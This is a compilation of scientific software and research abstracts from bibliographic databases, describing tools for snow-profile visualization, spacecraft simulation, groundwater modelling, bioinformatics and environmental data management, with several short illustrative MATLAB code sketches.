SnopViz is a visualization tool for both simulation outputs of the snow-cover model SNOWPACK and observed snow profiles. It has been designed to fulfil the needs of operational services (Swiss Avalanche Warning Service, Avalanche Canada) as well as offer the flexibility required to satisfy the specific needs of researchers. This JavaScript application runs on any modern browser and does not require an active Internet connection. The open source code is available for download from models.slf.ch where examples can also be run. Both the SnopViz library and the SnopViz User Interface will become a full replacement of the current research visualization tool SN_GUI for SNOWPACK. The SnopViz library is a stand-alone application that parses the provided input files, for example, a single snow profile (CAAML file format) or multiple snow profiles as output by SNOWPACK (PRO file format). A plugin architecture allows for handling JSON objects (JavaScript Object Notation) as well, and plugins for other file formats may be added easily. The outputs are provided either as vector graphics (SVG) or JSON objects. The SnopViz User Interface (UI) is a browser-based stand-alone interface. It runs in every modern browser, including IE, and allows user interaction with the graphs. SVG, the XML-based standard for vector graphics, was chosen because of its easy interaction with JS and good software support (Adobe Illustrator, Inkscape) to manipulate graphs outside SnopViz for publication purposes. SnopViz provides new visualization for SNOWPACK timeline output as well as time series input and output. The actual output format for SNOWPACK timelines was retained while time series are read from SMET files, a file format used in conjunction with the open source data handling code MeteoIO. Finally, SnopViz is able to render single snow profiles, either observed or modelled, that are provided as a CAAML file. This file format (caaml.org/Schemas/V5.0/Profiles/SnowProfileIACS) is an international standard to exchange snow profile data. It is supported by the International Association of Cryospheric Sciences (IACS) and was developed in collaboration with practitioners (Avalanche Canada).
A Low-Cost Real Color Picker Based on Arduino
Agudo, Juan Enrique; Pardo, Pedro J.; Sánchez, Héctor; Pérez, Ángel Luis; Suero, María Isabel
2014-01-01
Color measurements have traditionally been linked to expensive and difficult-to-handle equipment. The set of mathematical transformations that are needed to transfer a color that we observe in any object that doesn't emit its own light (which is usually called a color-object) so that it can be displayed on a computer screen or printed on paper is not at all trivial. This usually requires a thorough knowledge of color spaces, colorimetric transformations and color management systems. This paper presents a system for capturing, processing and managing the color of any non-self-luminous object, built around the TCS3414CS color sensor (I2C Sensor Color Grove) and low-cost Arduino-based hardware. Specific software has been developed in Matlab and a study of the linearity of chromatic channels and accuracy of color measurements for this device has been undertaken. All used scripts (Arduino and Matlab) are attached as supplementary material. The results show acceptable accuracy values which, although they obviously do not reach the levels obtained with scientific instruments, represent a good low-cost option given the price difference. PMID:25004152
PLATSIM: An efficient linear simulation and analysis package for large-order flexible systems
NASA Technical Reports Server (NTRS)
Maghami, Periman; Kenny, Sean P.; Giesy, Daniel P.
1995-01-01
PLATSIM is a software package designed to provide efficient time and frequency domain analysis of large-order generic space platforms implemented with any linear time-invariant control system. Time domain analysis provides simulations of the overall spacecraft response levels due to either onboard or external disturbances. The time domain results can then be processed by the jitter analysis module to assess the spacecraft's pointing performance in a computationally efficient manner. The resulting jitter analysis algorithms have produced an increase in speed of several orders of magnitude over the brute force approach of sweeping minima and maxima. Frequency domain analysis produces frequency response functions for uncontrolled and controlled platform configurations. The latter represents an enabling technology for large-order flexible systems. PLATSIM uses a sparse matrix formulation for the spacecraft dynamics model which makes both the time and frequency domain operations quite efficient, particularly when a large number of modes are required to capture the true dynamics of the spacecraft. The package is written in MATLAB script language. A graphical user interface (GUI) is included in the PLATSIM software package. This GUI uses MATLAB's Handle graphics to provide a convenient way for setting simulation and analysis parameters.
Optimization Routine for Generating Medical Kits for Spaceflight Using the Integrated Medical Model
NASA Technical Reports Server (NTRS)
Graham, Kimberli; Myers, Jerry; Goodenow, Deb
2017-01-01
The Integrated Medical Model (IMM) is a MATLAB model that provides probabilistic assessment of the medical risk associated with human spaceflight missions. Different simulations or profiles can be run in which input conditions regarding both mission characteristics and crew characteristics may vary. For each simulation, the IMM records the total medical events that occur and “treats” each event with resources drawn from import scripts. IMM outputs include Total Medical Events (TME), Crew Health Index (CHI), probability of Evacuation (pEVAC), and probability of Loss of Crew Life (pLOCL). The Crew Health Index is determined by the amount of quality time lost (QTL). Previously, an optimization code was implemented in order to efficiently generate medical kits. The kits were optimized to have the greatest benefit possible, given a mass and/or volume constraint. A 6-crew, 14-day lunar mission was chosen for the simulation and run through the IMM for 100,000 trials. A built-in MATLAB solver, mixed-integer linear programming, was used for the optimization routine. Kits were generated in 10% increments ranging from 10%-100% of the benefit constraints. Conditions where mass alone was minimized, volume alone was minimized, and where mass and volume were minimized jointly were tested.
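A minimal MATLAB sketch of the kit optimization described above: resources are selected to maximize total benefit under a mass limit with the mixed-integer linear programming solver intlinprog (Optimization Toolbox). Benefit scores, masses and the limit are placeholders, not IMM data.

% Illustrative knapsack-style kit selection with intlinprog (placeholder data).
benefit = [5.0 3.2 2.1 1.4 0.9]';      % benefit score per resource
mass    = [1.2 0.8 0.5 0.3 0.2]';      % mass per resource [kg]
massMax = 1.5;                          % allowed kit mass [kg]
n   = numel(benefit);
f   = -benefit;                         % intlinprog minimizes, so negate the benefit
A   = mass';  b = massMax;              % mass constraint A*x <= b
lb  = zeros(n,1);  ub = ones(n,1);      % each resource packed (1) or not (0)
x   = intlinprog(f, 1:n, A, b, [], [], lb, ub);   % all variables integer-constrained
fprintf('Packed items: %s  (mass %.2f kg)\n', mat2str(find(x > 0.5)'), mass'*x);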
NASA Astrophysics Data System (ADS)
1997-07-01
All the Letters to the Editor in this issue are in the same PostScript or PDF file. Contents: Joining capacitors (R Bridges, King Edward's School, Birmingham B15 2UA, UK); Enjoying Physics (John Bausor, 5 Longcrofte Road, Edgware, Middlesex HA8 6RR, UK); The disadvantages of success (M L Cooper, Newham College of Further Education, London).
Design, Development, and Testing of a Network Frequency Selection Service (NFSS)
1994-02-14
commercial simulation software (Sim++), word processor (FrameMaker), editor (Gnu Emacs), software version control (Revision Control System (RCS)), system...of FrameMaker ".mif" files. When viewed using FrameMaker or a PostScript reader, each page of results appears as two columns by four rows of graphics
Internet Wargaming with Distributed Processing Using the Client-Server Model
1997-03-01
in for war game development. There are tool kits for writing binary files that are interpreted by a particular plug-in. The most popular plug-in set...multi-player game development, the speed with which the environment is changing should be taken into account. For this project JavaScript was chosen
The IBM PC as an Online Search Machine. Part 5: Searching through Crosstalk.
ERIC Educational Resources Information Center
Kolner, Stuart J.
1985-01-01
This last of a five-part series on using the IBM personal computer for online searching highlights a brief review, search process, making the connection, switching between screens and modes, online transaction, capture buffer controls, coping with options, function keys, script files, processing downloaded information, note to TELEX users, and…
p3d--Python module for structural bioinformatics.
Fufezan, Christian; Specht, Michael
2009-08-21
High-throughput bioinformatic analysis tools are needed to mine the large amount of structural data via knowledge-based approaches. The development of such tools requires a robust interface to access the structural data in an easy way. For this, the Python scripting language is the optimal choice, since its philosophy is to write understandable source code. p3d is an object-oriented Python module that adds a simple yet powerful interface to the Python interpreter to process and analyse three-dimensional protein structure files (PDB files). p3d's strength arises from the combination of (a) very fast spatial access to the structural data due to the implementation of a binary space partitioning (BSP) tree, (b) set theory, and (c) functions that combine (a) and (b) and use human-readable language in the search queries rather than complex computer language. All these factors combined facilitate the rapid development of bioinformatic tools that can perform quick and complex analyses of protein structures. p3d is the perfect tool to quickly develop tools for structural bioinformatics using the Python scripting language.
Chapter 21: Programmatic Interfaces - STILTS
NASA Astrophysics Data System (ADS)
Fitzpatrick, M. J.
STILTS is the Starlink Tables Infrastructure Library Tool Set developed by Mark Taylor of the former Starlink Project. STILTS is a command-line tool (see the NVOSS_HOME/bin/stilts command) providing access to the same functionality driving the TOPCAT application and can be run using either the STILTS-specific jar file, or the more general TOPCAT jar file (both are available in the NVOSS_HOME/java/lib directory and are included in the default software environment classpath). The heart of both STILTS and TOPCAT is the STIL Java library. STIL is designed to efficiently handle the input, output and processing of very large tabular datasets and the STILTS task interface makes it an ideal tool for the scripting environment. Multiple formats are supported (including FITS Binary Tables, VOTable, CSV, SQL databases and ASCII, amongst others) and while some tools will generically handle all supported formats, others are specific to the VOTable format. Converting a VOTable to a more script-friendly format is the first thing most users will encounter, but there are many other useful tools as well.
A Python Script to Compute Isochrones for MODFLOW.
Feo, Alessandra; Zanini, Andrea; Petrella, Emma; Celico, Fulvio
2018-03-01
MODFLOW is today the most popular tool for modeling water flow in aquifers. To simplify the interface to MODFLOW, various GUIs have been developed for the creation of model definition files and for the visualization and interpretation of results. Recently Bakker et al. (2016) developed the FloPy interface to MODFLOW, which allows users to import and use the produced simulation data in Python. This makes it possible to construct model input files, run the models, and read and plot simulation results through Python scripts. In this note, we present a Python program, based on FloPy, that allows us to generate time-related capture zones (isochrones) for confined 2D steady-state groundwater flow in unbounded domains, with one or more wells. As an application, we show a validation of the approach and the results of four basic test cases: a homogeneous aquifer with one well, a heterogeneous aquifer with one well, and an aquifer with four wells located both longitudinally and perpendicularly to the flow direction. © 2017, National Ground Water Association.
A step-by-step solution for embedding user-controlled cines into educational Web pages.
Cornfeld, Daniel
2008-03-01
The objective of this article is to introduce a simple method for embedding user-controlled cines into a Web page using a simple JavaScript. Step-by-step instructions are included and the source code is made available. This technique allows the creation of portable Web pages that allow the user to scroll through cases as if seated at a PACS workstation. A simple JavaScript allows scrollable image stacks to be included on Web pages. With this technique, you can quickly and easily incorporate entire stacks of CT or MR images into online teaching files. This technique has the potential for use in case presentations, online didactics, teaching archives, and resident testing.
VESL: The Virtual Earth Sheet Laboratory for Ice Sheet Modeling and Visualization
NASA Astrophysics Data System (ADS)
Cheng, D. L. C.; Larour, E. Y.; Quinn, J. D.; Halkides, D. J.
2016-12-01
We introduce the Virtual Earth System Laboratory (VESL), a scientific modeling and visualization tool delivered through an integrated web portal for dissemination of data, simulation of physical processes, and promotion of climate literacy. The current prototype leverages NASA's Ice Sheet System Model (ISSM), a state-of-the-art polar ice sheet dynamics model developed at the Jet Propulsion Lab and UC Irvine. We utilize the Emscripten source-to-source compiler to convert the C/C++ ISSM engine core to JavaScript, and bundled pre/post-processing JS scripts to be compatible with the existing ISSM Python/Matlab API. Researchers using VESL will be able to effectively present their work for public dissemination with little-to-no additional post-processing. This will allow for faster publication in peer-reviewed journals and adaption of results for educational applications. Through future application of this concept to multiple aspects of the Earth System, VESL has the potential to broaden data applications in the geosciences and beyond. At this stage, we seek feedback from the greater scientific and public outreach communities regarding the ease of use and feature set of VESL, as we plan its expansion, and aim to achieve more rapid communication and presentation of scientific results.
Artimovich, Elena; Jackson, Russell K; Kilander, Michaela B C; Lin, Yu-Chih; Nestor, Michael W
2017-10-16
Intracellular calcium is an important ion involved in the regulation and modulation of many neuronal functions. From regulating cell cycle and proliferation to initiating signaling cascades and regulating presynaptic neurotransmitter release, the concentration and timing of calcium activity governs the function and fate of neurons. Changes in calcium transients can be used in high-throughput screening applications as a basic measure of neuronal maturity, especially in developing or immature neuronal cultures derived from stem cells. Here we describe PeakCaller, a novel MATLAB script and graphical user interface for the quantification of intracellular calcium transients in neuronal cultures. PeakCaller allows the user to set peak parameters and smoothing algorithms to best fit their data set. Using human induced pluripotent stem cell derived neurons and dissociated mouse cortical neurons combined with the calcium indicator Fluo-4, we demonstrate that PeakCaller reduces type I and type II error in automated peak calling when compared to the oft-used PeakFinder algorithm under both basal and pharmacologically induced conditions. This new analysis script will allow for automation of calcium measurements and is a powerful software tool for researchers interested in high-throughput measurements of intracellular calcium.
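PeakCaller's own interface is not reproduced here; as a minimal illustration of the kind of thresholded peak detection it automates, the MATLAB sketch below detects transients in a single fluorescence trace. The file name, sampling rate, and threshold values are hypothetical assumptions, smoothing uses a simple moving mean, and findpeaks requires the Signal Processing Toolbox.

% Illustrative sketch of automated peak calling on a fluorescence trace.
% Assumptions: traces.csv (hypothetical) holds one ROI trace per column,
% sampled at fs Hz; findpeaks needs the Signal Processing Toolbox.
fs = 10;                               % sampling rate in Hz (assumed)
T  = readtable('traces.csv');          % hypothetical input file
f  = T{:, 1};                          % first ROI trace
f0 = median(f);                        % crude baseline estimate
dff = (f - f0) / f0;                   % dF/F normalization
dffSmooth = movmean(dff, 5);           % simple smoothing window
[pk, loc] = findpeaks(dffSmooth, ...
    'MinPeakHeight', 0.1, ...          % amplitude threshold (assumed)
    'MinPeakProminence', 0.05, ...     % rejects shallow fluctuations
    'MinPeakDistance', round(0.5*fs)); % minimum gap between events
t = (0:numel(dff)-1) / fs;
plot(t, dffSmooth); hold on
plot(t(loc), pk, 'rv');                % mark detected transients
fprintf('%d transients detected\n', numel(pk));

Tuning MinPeakHeight and MinPeakProminence plays the role of the user-set peak parameters described in the abstract.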
DOE Office of Scientific and Technical Information (OSTI.GOV)
Tien, C; Brewer, M; Studenski, M
Purpose: Dynamic-jaw tracking maximizes the area blocked by both jaw and MLC in RapidArc. We developed a method to quantify jaw tracking. Methods: An Eclipse Scripting API (ESAPI) script was used to export beam parameters for each arc’s control points. The specific beam parameters extracted were: gantry angle, control point number, meterset, x-jaw positions, y-jaw positions, MLC bank-number, MLC leaf-number, and MLC leaf-position. Each arc contained 178 control points with 120 MLC positions. MATLAB routines were written to process these parameters in order to calculate the beam aperture (unblocked) size for each control point. An average aperture size was weighted by meterset. Jaw factor was defined as the ratio of dynamic-jaw to static-jaw aperture size. Jaw factor was determined for forty retrospectively replanned patients treated with static-jaw delivery, with sites including lung, brain, prostate, H&N, rectum, and bladder. Results: Most patients had multiple arcs and reduced-field boosts, resulting in 151 fields. Of these, the lowest (0.4722) and highest (0.9622) jaw factors were observed in prostate and rectal cases, respectively. The median jaw factor was 0.7917, meaning there is potential for roughly 20% additional blocking. Clinically, the dynamic-jaw tracking represents an area surrounding the target which would receive MLC-only leakage transmission of 1.68% versus 0.1% with jaws. Jaw-tracking was more pronounced at areas farther from the target. In prostate patients, the rectum and bladder had 5.5% and 6.3% lower mean dose, respectively; the structures closer to the prostate such as the rectum and bladder both had 1.4% lower mean dose. Conclusion: A custom ESAPI script was coupled with a MATLAB routine in order to extract beam parameters from static-jaw plans and their replanned dynamic-jaw deliveries. The effects were quantified using the jaw factor, which is the ratio of the meterset-weighted aperture size for dynamic-jaw fields to that for static-jaw fields.
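The abstract does not give the aperture formula, but a minimal MATLAB sketch of the meterset-weighted aperture and jaw-factor calculation might look as follows, under the assumption that jaw positions, MLC bank positions, and meterset weights per control point have already been exported into struct arrays. The field names and the function itself are hypothetical, not the authors' routine.

function jf = jawFactorSketch(cpDyn, cpStat)
% Sketch of the jaw-factor calculation described above (not the authors' code).
% Each input is a struct array over control points with hypothetical fields:
%   x1, x2, y1, y2   jaw positions [mm]
%   A, B             MLC bank A/B positions, one value per leaf [mm]
%   yLo, yHi         lower/upper edge of each leaf [mm]
%   mu               meterset weight for this control point
jf = weightedAperture(cpDyn) / weightedAperture(cpStat);
end

function w = weightedAperture(cp)
area = zeros(numel(cp), 1);
for k = 1:numel(cp)
    inY = max(min(cp(k).y2, cp(k).yHi) - max(cp(k).y1, cp(k).yLo), 0);
    inX = max(min(cp(k).x2, cp(k).B)   - max(cp(k).x1, cp(k).A),   0);
    area(k) = sum(inY .* inX);                % jaw/MLC intersection per leaf
end
w = sum(area .* [cp.mu]') / sum([cp.mu]);     % meterset-weighted mean aperture
end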
Sample Analysis at Mars Instrument Simulator
NASA Technical Reports Server (NTRS)
Benna, Mehdi; Nolan, Tom
2013-01-01
The Sample Analysis at Mars Instrument Simulator (SAMSIM) is a numerical model dedicated to planning and validating operations of the Sample Analysis at Mars (SAM) instrument on the surface of Mars. The SAM instrument suite, currently operating on the Mars Science Laboratory (MSL), is an analytical laboratory designed to investigate the chemical and isotopic composition of the atmosphere and volatiles extracted from solid samples. SAMSIM was developed using Matlab and Simulink libraries of MathWorks Inc. to provide MSL mission planners with accurate predictions of the instrument electrical, thermal, mechanical, and fluid responses to scripted commands. This tool is a first example of multi-purpose, full-scale numerical modeling of a flight instrument with the purpose of supplementing or even eliminating entirely the need for a hardware engineering model during instrument development and operation. SAMSIM simulates the complex interactions that occur between the instrument Command and Data Handling unit (C&DH) and all subsystems during the execution of experiment sequences. A typical SAM experiment takes many hours to complete and involves hundreds of components. During the simulation, the electrical, mechanical, thermal, and gas dynamics states of each hardware component are accurately modeled and propagated within the simulation environment at faster than real time. This allows the simulation, in just a few minutes, of experiment sequences that take many hours to execute on the real instrument. The SAMSIM model is divided into five distinct but interacting modules: software, mechanical, thermal, gas flow, and electrical modules. The software module simulates the instrument C&DH by executing a customized version of the instrument flight software in a Matlab environment. The inputs and outputs to this synthetic C&DH are mapped to virtual sensors and command lines that mimic in their structure and connectivity the layout of the instrument harnesses. This module executes, and thus validates, complex command scripts prior to their up-linking to the SAM instrument. As an output, this module generates synthetic data and message logs at a rate that is similar to the actual instrument.
DOE Office of Scientific and Technical Information (OSTI.GOV)
Moskvin, V; Pirlepesov, F; Tsiamas, P
Purpose: This study provides an overview of the design and commissioning of the Monte Carlo (MC) model of the spot-scanning proton therapy nozzle and its implementation for the patient plan simulation. Methods: The Hitachi PROBEAT V scanning nozzle was simulated based on vendor specifications using the TOPAS extension of Geant4 code. FLUKA MC simulation was also utilized to provide supporting data for the main simulation. Validation of the MC model was performed using vendor provided data and measurements collected during acceptance/commissioning of the proton therapy machine. Actual patient plans using CT based treatment geometry were simulated and compared to the dose distributions produced by the treatment planning system (Varian Eclipse 13.6), and patient quality assurance measurements. In-house MATLAB scripts are used for converting DICOM data into TOPAS input files. Results: Comparison analysis of integrated depth doses (IDDs), therapeutic ranges (R90), and spot shape/sizes at different distances from the isocenter, indicate good agreement between MC and measurements. R90 agreement is within 0.15 mm across all energy tunes. IDDs and spot shapes/sizes differences are within statistical error of simulation (less than 1.5%). The MC simulated data, validated with physical measurements, were used for the commissioning of the treatment planning system. Patient geometry simulations were conducted based on the Eclipse produced DICOM plans. Conclusion: The treatment nozzle and standard option beam model were implemented in the TOPAS framework to simulate a highly conformal discrete spot-scanning proton beam system.
Nestly--a framework for running software with nested parameter choices and aggregating results.
McCoy, Connor O; Gallagher, Aaron; Hoffman, Noah G; Matsen, Frederick A
2013-02-01
The execution of a software application or pipeline using various combinations of parameters and inputs is a common task in bioinformatics. In the absence of a specialized tool to organize, streamline and formalize this process, scientists must write frequently complex scripts to perform these tasks. We present nestly, a Python package to facilitate running tools with nested combinations of parameters and inputs. nestly provides three components. First, a module to build nested directory structures corresponding to choices of parameters. Second, the nestrun script to run a given command using each set of parameter choices. Third, the nestagg script to aggregate results of the individual runs into a CSV file, as well as support for more complex aggregation. We also include a module for easily specifying nested dependencies for the SCons build tool, enabling incremental builds. Source, documentation and tutorial examples are available at http://github.com/fhcrc/nestly. nestly can be installed from the Python Package Index via pip; it is open source (MIT license).
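nestly itself is a Python package, but the underlying pattern (build a directory per parameter combination, run a command in each, then aggregate results into a CSV) is easy to sketch in MATLAB, the language used throughout this compilation. In the sketch below the external tool name, parameter names, and output file layout are hypothetical.

% Sketch of a nested parameter sweep with per-run directories and CSV aggregation.
alphas = [0.1 0.5 1.0];
betas  = [10 100];
rows = {};
for a = alphas
    for b = betas
        runDir = fullfile('runs', sprintf('alpha_%g_beta_%g', a, b));
        if ~exist(runDir, 'dir'), mkdir(runDir); end
        % Write a tiny config consumed by a hypothetical external tool.
        fid = fopen(fullfile(runDir, 'params.txt'), 'w');
        fprintf(fid, 'alpha=%g\nbeta=%g\n', a, b);
        fclose(fid);
        system(sprintf('mytool --config %s --out %s', ...   % hypothetical command
            fullfile(runDir, 'params.txt'), fullfile(runDir, 'result.csv')));
        r = readtable(fullfile(runDir, 'result.csv'));      % assumed single-row output
        rows(end+1, :) = {a, b, r.score(1)};                %#ok<AGROW>
    end
end
writetable(cell2table(rows, 'VariableNames', {'alpha','beta','score'}), 'aggregated.csv');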
SeqDepot: streamlined database of biological sequences and precomputed features.
Ulrich, Luke E; Zhulin, Igor B
2014-01-15
Assembling and/or producing integrated knowledge of sequence features continues to be an onerous and redundant task despite a large number of existing resources. We have developed SeqDepot, a novel database that focuses solely on two primary goals: (i) assimilating known primary sequences with predicted feature data and (ii) providing the most simple and straightforward means to procure and readily use this information. Access to >28.5 million sequences and 300 million features is provided through a well-documented and flexible RESTful interface that supports fetching specific data subsets, bulk queries, visualization and searching by MD5 digests or external database identifiers. We have also developed an HTML5/JavaScript web application exemplifying how to interact with SeqDepot and Perl/Python scripts for use with local processing pipelines. Freely available on the web at http://seqdepot.net/. REST access via http://seqdepot.net/api/v1. Database files and scripts may be downloaded from http://seqdepot.net/download.
Scripting MODFLOW model development using Python and FloPy
Bakker, Mark; Post, Vincent E. A.; Langevin, Christian D.; Hughes, Joseph D.; White, Jeremy; Starn, Jeffrey; Fienen, Michael N.
2016-01-01
Graphical user interfaces (GUIs) are commonly used to construct and postprocess numerical groundwater flow and transport models. Scripting model development with the programming language Python is presented here as an alternative approach. One advantage of Python is that there are many packages available to facilitate the model development process, including packages for plotting, array manipulation, optimization, and data analysis. For MODFLOW-based models, the FloPy package was developed by the authors to construct model input files, run the model, and read and plot simulation results. Use of Python with the available scientific packages and FloPy facilitates data exploration, alternative model evaluations, and model analyses that can be difficult to perform with GUIs. Furthermore, Python scripts are a complete, transparent, and repeatable record of the modeling process. The approach is introduced with a simple FloPy example to create and postprocess a MODFLOW model. A more complicated capture-fraction analysis with a real-world model is presented to demonstrate the types of analyses that can be performed using Python and FloPy.
NASA Astrophysics Data System (ADS)
Sylwestrzak, Marcin; Szlag, Daniel; Marchand, Paul J.; Kumar, Ashwin S.; Lasser, Theo
2017-08-01
We present an application of massively parallel processing of quantitative flow measurement data acquired using spectral optical coherence microscopy (SOCM). The need for massive signal processing of these particular datasets has been a major hurdle for many applications based on SOCM. In view of this difficulty, we implemented and adapted quantitative total flow estimation algorithms on graphics processing units (GPU) and achieved a 150-fold reduction in processing time when compared to a former CPU implementation. As SOCM constitutes the microscopy counterpart to spectral optical coherence tomography (SOCT), the developed processing procedure can be applied to both imaging modalities. We present the developed DLL library integrated in MATLAB (with an example) and have included the source code for adaptations and future improvements.
Catalogue identifier: AFBT_v1_0
Program summary URL: http://cpc.cs.qub.ac.uk/summaries/AFBT_v1_0.html
Program obtainable from: CPC Program Library, Queen's University, Belfast, N. Ireland
Licensing provisions: GNU GPLv3
No. of lines in distributed program, including test data, etc.: 913552
No. of bytes in distributed program, including test data, etc.: 270876249
Distribution format: tar.gz
Programming language: CUDA/C, MATLAB.
Computer: Intel x64 CPU, GPU supporting CUDA technology.
Operating system: 64-bit Windows 7 Professional.
Has the code been vectorized or parallelized?: Yes, CPU code has been vectorized in MATLAB, CUDA code has been parallelized.
RAM: Dependent on user's parameters, typically between several gigabytes and several tens of gigabytes
Classification: 6.5, 18.
Nature of problem: Speed up of data processing in optical coherence microscopy
Solution method: Utilization of GPU for massively parallel data processing
Additional comments: Compiled DLL library with source code and documentation, example of utilization (MATLAB script with raw data)
Running time: 1.8 s for one B-scan (150× faster than the CPU data processing time)
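The compiled CUDA library itself is distributed with the paper; as a minimal illustration of the same idea of offloading the heavy transform step to the GPU from within MATLAB, the sketch below compares a CPU and GPU FFT on synthetic spectral data. It assumes the Parallel Computing Toolbox and a CUDA-capable device, and it is not the authors' processing chain.

% Sketch: CPU vs GPU FFT timing on synthetic spectral-domain data.
% Requires the Parallel Computing Toolbox and a CUDA-capable device.
fringes = rand(2048, 2000, 'single');            % synthetic spectra (one B-scan)
tCPU = timeit(@() abs(fft(fringes, [], 1)));     % depth profiles on the CPU
g = gpuArray(fringes);                           % transfer once to device memory
tGPU = gputimeit(@() abs(fft(g, [], 1)));        % same transform on the GPU
ascansGPU = gather(abs(fft(g, [], 1)));          % bring the result back to host
fprintf('CPU %.3f s, GPU %.3f s, speed-up %.1fx\n', tCPU, tGPU, tCPU/tGPU);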
The Figure.tar.gz contains a directory for each WRF ensemble run. In these directories are *.csv files for each meteorology variable examined. These are comma delimited text files that contain statistics for each observation site. Also provided is an R script that reads these files (user would need to change directory pointers) and computes the variability of error and bias of the ensemble at each site and plots these for reproduction of figure 3. This dataset is associated with the following publication: Gilliam, R., C. Hogrefe, J. Godowitch, S. Napelenok, R. Mathur, and S.T. Rao. Impact of inherent meteorology uncertainty on air quality model predictions. JOURNAL OF GEOPHYSICAL RESEARCH-ATMOSPHERES. American Geophysical Union, Washington, DC, USA, 120(23): 12,259–12,280, (2015).
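The dataset ships its own R script; an analogous sketch in MATLAB that reads one of the per-variable CSV files and summarizes ensemble bias and error variability per site is shown below. The file name and column names are hypothetical, since the actual column layout is not documented in this record.

% Sketch: per-site ensemble bias and error variability from a CSV of statistics.
% Hypothetical columns: site, member, bias, rmse (actual layout not documented here).
T = readtable('temperature_2m.csv');                 % hypothetical file name
[sites, ~, idx] = unique(T.site);
meanBias = accumarray(idx, T.bias, [], @mean);       % mean bias across members
errSpread = accumarray(idx, T.rmse, [], @std);       % variability of error
bar(errSpread); xticklabels(sites); xtickangle(45);
ylabel('Std. dev. of RMSE across ensemble members');
disp(table(sites, meanBias, errSpread));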
DOE Office of Scientific and Technical Information (OSTI.GOV)
Allevato, Adam
2016-07-21
ROSSTEP is a system for sequentially running roslaunch, rosnode, and bash scripts automatically, for use in Robot Operating System (ROS) applications. The system consists of YAML files which define actions and conditions. A Python file parses the code and runs actions sequentially using the sys and subprocess Python modules. Between actions, it uses various ROS-based code to check conditions required to proceed, and only moves on to the next action when all the necessary conditions have been met. Included is rosstep-creator, a Qt application designed to create the YAML files required for ROSSTEP. It has a nearly one-to-one mapping from interface elements to YAML output, and serves as a convenient GUI for working with the ROSSTEP system.
BaHaMAS A Bash Handler to Monitor and Administrate Simulations
NASA Astrophysics Data System (ADS)
Sciarra, Alessandro
2018-03-01
Numerical QCD is often extremely resource demanding and it is not rare to run hundreds of simulations at the same time. Each of these can last for days or even months and typically requires a job-script file as well as an input file with the physical parameters for the application to be run. Moreover, some monitoring operations (i.e. copying, moving, deleting or modifying files, resuming crashed jobs, etc.) are often required to guarantee that the final statistics is correctly accumulated. Handling simulations manually is probably the most error-prone approach, and it is also uncomfortable and inefficient! BaHaMAS was developed and successfully used in recent years as a tool to automatically monitor and administrate simulations.
NASA Astrophysics Data System (ADS)
1997-03-01
All the Letters to the Editor in this issue are in the same PostScript or PDF file. Contents Criticisms of hands-on pseudoscience David J Fisher 27 Elderberry Road, Cardiff CF5 3RG, UK Measuring varying fields Don Koks Adelaide University, Australia Relativity at A-level: a comment David Sang 3 Ellasdale Road, Bognor Regis, PO21 2SG, UK
Adaptive smart simulator for characterization and MPPT construction of PV array
NASA Astrophysics Data System (ADS)
Ouada, Mehdi; Meridjet, Mohamed Salah; Dib, Djalel
2016-07-01
Partial shading conditions are among the most important problems in large photovoltaic arrays. Many works in the literature address the modeling, control and optimization of photovoltaic conversion of solar energy under partial shading conditions. The aim of this study is to build a software simulator, analogous to a hardware simulator, that produces a shading pattern of the proposed photovoltaic array, so that the delivered information can be used to obtain an optimal configuration of the PV array and to construct an MPPT algorithm. Graphical user interfaces (Matlab GUI) are built using a developed script; the tool is simple, easy to use, and responsive, and the simulator supports large array simulations that can be interfaced with MPPT and power electronic converters.
DOE Office of Scientific and Technical Information (OSTI.GOV)
Duro, Francisco Rodrigo; Garcia Blas, Javier; Isaila, Florin
This paper explores novel techniques for improving the performance of many-task workflows based on the Swift scripting language. We propose novel programmer options for automated distributed data placement and task scheduling. These options trigger a data placement mechanism used for distributing intermediate workflow data over the servers of Hercules, a distributed key-value store that can be used to cache file system data. We demonstrate that these new mechanisms can significantly improve the aggregated throughput of many-task workflows by up to 86x, reduce the contention on the shared file system, exploit the data locality, and trade off locality and load balance.
Using Cesium for 3D Thematic Visualisations on the Web
NASA Astrophysics Data System (ADS)
Gede, Mátyás
2018-05-01
Cesium (http://cesiumjs.org) is an open source, WebGL-based JavaScript library for virtual globes and 3D maps. It is an excellent tool for 3D thematic visualisations, but to use its full functionality it has to be fed with its own file format, CZML. Unfortunately, this format is not yet supported by any major GIS software. This paper introduces a plugin for QGIS, developed by the author, which facilitates the creation of CZML files for various types of visualisations. The usability of Cesium is also examined in various hardware/software environments.
NASA Astrophysics Data System (ADS)
Sheldon, W.; Chamblee, J.; Cary, R. H.
2013-12-01
Environmental scientists are under increasing pressure from funding agencies and journal publishers to release quality-controlled data in a timely manner, as well as to produce comprehensive metadata for submitting data to long-term archives (e.g. DataONE, Dryad and BCO-DMO). At the same time, the volume of digital data that researchers collect and manage is increasing rapidly due to advances in high frequency electronic data collection from flux towers, instrumented moorings and sensor networks. However, few pre-built software tools are available to meet these data management needs, and those tools that do exist typically focus on part of the data management lifecycle or one class of data. The GCE Data Toolbox has proven to be both a generalized and effective software solution for environmental data management in the Long Term Ecological Research Network (LTER). This open source MATLAB software library, developed by the Georgia Coastal Ecosystems LTER program, integrates metadata capture, creation and management with data processing, quality control and analysis to support the entire data lifecycle. Raw data can be imported directly from common data logger formats (e.g. SeaBird, Campbell Scientific, YSI, Hobo), as well as delimited text files, MATLAB files and relational database queries. Basic metadata are derived from the data source itself (e.g. parsed from file headers) and by value inspection, and then augmented using editable metadata templates containing boilerplate documentation, attribute descriptors, code definitions and quality control rules. Data and metadata content, quality control rules and qualifier flags are then managed together in a robust data structure that supports database functionality and ensures data validity throughout processing. A growing suite of metadata-aware editing, quality control, analysis and synthesis tools are provided with the software to support managing data using graphical forms and command-line functions, as well as developing automated workflows for unattended processing. Finalized data and structured metadata can be exported in a wide variety of text and MATLAB formats or uploaded to a relational database for long-term archiving and distribution. The GCE Data Toolbox can be used as a complete, light-weight solution for environmental data and metadata management, but it can also be used in conjunction with other cyber infrastructure to provide a more comprehensive solution. For example, newly acquired data can be retrieved from a Data Turbine or Campbell LoggerNet Database server for quality control and processing, then transformed to CUAHSI Observations Data Model format and uploaded to a HydroServer for distribution through the CUAHSI Hydrologic Information System. The GCE Data Toolbox can also be leveraged in analytical workflows developed using Kepler or other systems that support MATLAB integration or tool chaining. This software can therefore be leveraged in many ways to help researchers manage, analyze and distribute the data they collect.
